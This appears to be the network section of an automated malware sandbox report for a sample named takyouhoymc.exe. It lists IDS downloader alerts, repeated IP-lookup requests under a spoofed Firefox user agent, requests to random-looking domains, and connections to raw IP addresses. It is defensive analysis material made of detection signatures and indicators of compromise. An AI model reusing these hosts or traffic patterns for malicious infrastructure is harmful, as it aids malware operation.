Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49926 -> 151.101.128.81:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49926 -> 151.101.128.81:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49913 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49913 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49932 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49932 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49914 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49914 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49937 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49937 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49892 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49892 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49897 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49897 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49945 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49945 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49915 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49915 -> 104.27.207.92:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49959 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49959 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49954 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49954 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49919 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49919 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49927 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49927 -> 172.67.155.175:80
Source: Network trafficSuricata IDS: 2803306 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC : 192.168.11.30:49941 -> 104.19.223.79:80
Source: Network trafficSuricata IDS: 2803307 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern General HAUC : 192.168.11.30:49941 -> 104.19.223.79:80
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.myspace.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: lwbjtptjlzji.netAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.facebook.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: xhjwwgwd.infoAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: wsmpvwxb.infoAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.imdb.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.imdb.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: unknownTCP traffic detected without corresponding DNS query: 114.25.71.193
Source: unknownTCP traffic detected without corresponding DNS query: 114.25.71.193
Source: unknownTCP traffic detected without corresponding DNS query: 114.25.71.193
Source: unknownTCP traffic detected without corresponding DNS query: 114.25.71.193
Source: unknownTCP traffic detected without corresponding DNS query: 114.25.71.193
Source: unknownTCP traffic detected without corresponding DNS query: 178.90.73.188
Source: unknownTCP traffic detected without corresponding DNS query: 178.90.73.188
Source: unknownTCP traffic detected without corresponding DNS query: 178.90.73.188
Source: unknownTCP traffic detected without corresponding DNS query: 178.90.73.188
Source: unknownTCP traffic detected without corresponding DNS query: 178.90.73.188
Source: unknownTCP traffic detected without corresponding DNS query: 89.215.115.4
Source: unknownTCP traffic detected without corresponding DNS query: 89.215.115.4
Source: unknownTCP traffic detected without corresponding DNS query: 89.215.115.4
Source: unknownTCP traffic detected without corresponding DNS query: 41.47.39.184
Source: unknownTCP traffic detected without corresponding DNS query: 41.47.39.184
Source: unknownTCP traffic detected without corresponding DNS query: 41.47.39.184
Source: unknownTCP traffic detected without corresponding DNS query: 85.217.219.168
Source: unknownTCP traffic detected without corresponding DNS query: 85.217.219.168
Source: unknownTCP traffic detected without corresponding DNS query: 85.217.219.168
Source: unknownTCP traffic detected without corresponding DNS query: 212.75.9.215
Source: unknownTCP traffic detected without corresponding DNS query: 212.75.9.215
Source: unknownTCP traffic detected without corresponding DNS query: 212.75.9.215
Source: unknownTCP traffic detected without corresponding DNS query: 212.75.9.215
Source: unknownTCP traffic detected without corresponding DNS query: 212.75.9.215
Source: unknownTCP traffic detected without corresponding DNS query: 212.75.9.215
Source: unknownTCP traffic detected without corresponding DNS query: 46.159.134.7
Source: unknownTCP traffic detected without corresponding DNS query: 46.159.134.7
Source: unknownTCP traffic detected without corresponding DNS query: 46.159.134.7
Source: unknownTCP traffic detected without corresponding DNS query: 188.114.42.197
Source: unknownTCP traffic detected without corresponding DNS query: 188.114.42.197
Source: unknownTCP traffic detected without corresponding DNS query: 188.114.42.197
Source: unknownTCP traffic detected without corresponding DNS query: 89.215.35.152
Source: unknownTCP traffic detected without corresponding DNS query: 89.215.35.152
Source: unknownTCP traffic detected without corresponding DNS query: 89.215.35.152
Source: unknownTCP traffic detected without corresponding DNS query: 41.47.39.184
Source: unknownTCP traffic detected without corresponding DNS query: 41.47.39.184
Source: unknownTCP traffic detected without corresponding DNS query: 41.47.39.184
Source: unknownTCP traffic detected without corresponding DNS query: 78.63.102.38
Source: unknownTCP traffic detected without corresponding DNS query: 78.63.102.38
Source: unknownTCP traffic detected without corresponding DNS query: 78.63.102.38
Source: unknownTCP traffic detected without corresponding DNS query: 114.25.71.193
Source: unknownTCP traffic detected without corresponding DNS query: 114.25.71.193
Source: unknownTCP traffic detected without corresponding DNS query: 114.25.71.193
Source: unknownTCP traffic detected without corresponding DNS query: 114.25.71.193
Source: unknownTCP traffic detected without corresponding DNS query: 114.25.71.193
Source: unknownTCP traffic detected without corresponding DNS query: 89.215.35.152
Source: unknownTCP traffic detected without corresponding DNS query: 89.215.35.152
Source: unknownTCP traffic detected without corresponding DNS query: 89.215.35.152
Source: unknownTCP traffic detected without corresponding DNS query: 85.217.219.168
Source: unknownTCP traffic detected without corresponding DNS query: 85.217.219.168
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040286C select,__WSAFDIsSet,recv,2_2_0040286C
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.myspace.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: lwbjtptjlzji.netAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.facebook.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: xhjwwgwd.infoAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: wsmpvwxb.infoAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.showmyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.imdb.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatismyip.comAccept: */*User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Connection: close
